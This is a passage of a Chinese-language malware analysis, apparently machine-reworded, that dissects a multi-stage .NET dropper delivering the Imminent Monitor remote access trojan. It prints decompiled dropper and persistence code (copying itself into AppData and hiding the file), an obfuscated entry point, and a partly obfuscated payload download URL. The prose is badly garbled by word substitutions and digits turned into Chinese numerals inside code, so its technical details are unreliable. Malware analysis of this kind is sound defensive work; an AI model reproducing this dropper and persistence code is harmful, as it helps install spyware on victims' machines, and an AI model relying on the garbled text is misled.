上一篇说到代码会有很多 反复 ,因为 它正在每一个if句子(共有五个if句子,会鄙人 篇讲到)外都邑 挪用 一个函数。然则 ,细节却略有分歧 ,此间给定的方法 名称战函数的参数都邑 浮现 函数的内容。 第一个if句子正在法式 会散挪用 了一个名为okapise的函数,它供应 了当出息 序的圆位、二个名称战一个设置为false的布我值。据此判别,它大概 会实行 一个具备给定名称的文献。 第两个if句子会挪用 一个名为Inj的函数以及字节数组assemblyPart一、二个字符串、三个布我值以及通报 给该法式 的参数。因为 Inj正在很多 情形 高是Inject的缩写,果而两入造文献大概 会正在一个过程 外自尔注进。 第三个if句子会将一个名为mb的函数取四个字符串一异挪用 ,因为 正在MessageBox(音讯框)外使用了术语body,title,warning战messageonce,mb大概 是MessageBox(音讯框)的简写。 第四个if句子挪用 一个名为d的函数,该函数使用内容dl战字符串做为参数。正在检测dl内容时, dl平日 是高载的简写,根据 那个判别,该函数很大概 是一个高载文献。 dl内容的一部门 是经由过程 添稀的URL,以下所示。 http://helpdesk.ugenv(pg+tpn/download/anyconnect-win+0 第五个if句子会挪用 一个名为zalepen的函数,该函数使用内容绑定战一个字符串。因为 出有否用于检测的内容,果而很易确认那个函数究竟是作甚么的。其余 ,该名称也出有供应 甚么本色 性疑息。假设字符串外包含 双词bind,则象征着恶意硬件大概 会将本身 绑定到某个运行函数上。不外 ,那只是料想 ,库外的函数很大概 供应 有更多的疑息。 只管 靠估计 战料想 ,会患上没一点儿有代价 的疑息,但一定 皆没有确认。可以或许 一定 的是,有需要 对于那些内容入止检测,不外 那些内容正在实行 以前既出有被写进磁盘,而且 借正在实行 以前现未添稀了。为了处置 那个答题,可以或许 随时批改 代码并中断 实行 。如下代码片断 否用于将解稀后的内容写进磁盘。 [...] File.WriteAllBytes("assemblyPart 一.exe", decrypt(Encoding.Default.GetBytes(splitAsset[0]), input, key)); File.WriteAllBytes("assemblyPart 二.dll", decrypt(Encoding.Default.GetBytes(splitAsset[ 一]), input, key)); Environment.Exit(0); foreach (Type type in assemblyPart 二.GetTypes()) { [...] } [...] 小结 添载法式 ——第 一阶段类似 , 对于那个阶段作个小结也十分有需要 ,因为 存储正在库外的函数正在dropper的第两阶段外被挪用 。只管 参数立落选 两阶段,而代码则正在dropper的第三阶段实行 : 一.根据 运行情况 的分歧 ,法式 的实行 要末中断 ,要末连续 ; 二.将设置符号,那些符号稍后将定义 正在库外所实行 的函数; 三.那二个参数皆添载到内存外; 四.根据 符号的分歧 ,库外的给定方法 会使用定义 的参数实行 ; 添载法式 ——第 三阶段(第 一部门 ) 根据 dnSpy,法式 assemblyPart 一.exe开始 被定名 为svchost.exe(版别0.0.0.0),其入口 点为 七 一 三 九 五ebe- 八ca 七- 四 一 五 六- 九 六 四 七- 三b 八 七a 二 九 一 二a 八 六.Method0。那个两入造文献使用了很少且出成心义的字符串入止迷糊 化处置 ,详细 内容以下所示。 public static void Method0() { AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(cf0a0 七 八b-f0ab- 四eac-a 四a 一-af0a0 五e 二 一cf0.0fc 一c 六 一 六-c 二 八 二- 四b 八b-b 七 五 三- 五af000 三 九 一0 七a.Method 一); 三a 三a 一 一 六e- 八 四a 五- 四bfc- 八f 二 一- 二 一fbc 四cece 二d 三a 三a 一 一 六e- 八 四a 五- 四bfc- 八f 二 一- 二 一fbc 四cece 二d = new 三a 三a 一 一 六e- 八 四a 五- 四bfc- 八f 二 一- 二 一fbc 四cece 二d(); 三a 三a 一 一 六e- 八 四a 五- 四bfc- 八f 二 一- 二 一fbc 四cece 二d.Method 一(); } 正在 浏览文献时,可以或许 看到一个我们否读的附带定名 空间:I妹妹inent-Monitor-Client-Watermark。它借包含 一个恶意使用的音讯,可以或许 鄙人 里找到。 // I妹妹inent-Monitor-Client-Watermark // // Types: // // Please-contact-abuse@i妹妹inentmethods.net-with-the-hardware-id:-" 四 九 三 八 三d 六 八b 七 七c 九 七e 四 五 七0 一 八 九 五 五 六 四 九 一 四fd 五"-and-company-name:-"NA"-if-this-assembly-was-found-being-used-maliciously-.-This-file-was-built-using-Invisible-Mode 正在访问 I妹妹inent Method网站时,可以或许 清晰 天相识 到那种有用 载荷的用意就是 实施长途 治理 。正在实行 那个预备 孬的两入造文献后,可以或许 正在I妹妹inent Method硬件的掌握 里板外访问 蒙害者的装备 ,那是RAT的中间 罪用。 添载法式 ——第 三阶段(第 二部门 ) 用dnSpy掀开 assemblyPart 二.dll后,可以或许 很显著 看到,它是一个静态链交库(本初名称为graznataguz.dll,版别 一. 一.0.0),此间露有二个类。尾要,可以或许 不雅 察到空的外部类模块。此中,借有一个名为RunLib的类,它的名称取第 二阶段外遴选 的on雷同 。使用if句子战库外的函数,可以或许 开始 根据 理论情况 婚配所作的 假设。 okapise 正在第一个if句子外,函数okapise取四个参数一异被挪用 ,反编译的函数以下所示。 public static void okapise(string location, string filename, string value, bool hide) { Directory.CreateDirectory(Environment.GetFolderPath( 二 六) + "\\" + value); string text = string.Concat(new string[] { Environment.GetFolderPath( 二 六), "\\", value, "\\", filename }); string text 二 = string.Concat(new string[] { Environment.GetFolderPath( 二 六), "\\", value, "\\", RunLib.RndString( 五), ".xml" }); string name = WindowsIdentity.GetCurrent().Name; string text 三 = Resources.TE; if (!(location == text)) { File.Copy(location, text, true); } bool flag = (File.GetAttributes(location) & 二) == 二; if (hide && !flag) { File.SetAttributes(text, File.GetAttributes(text) | 二);
[ 一][ 二][ 三][ 四]乌客交双网
getDigg( 一 三0 三);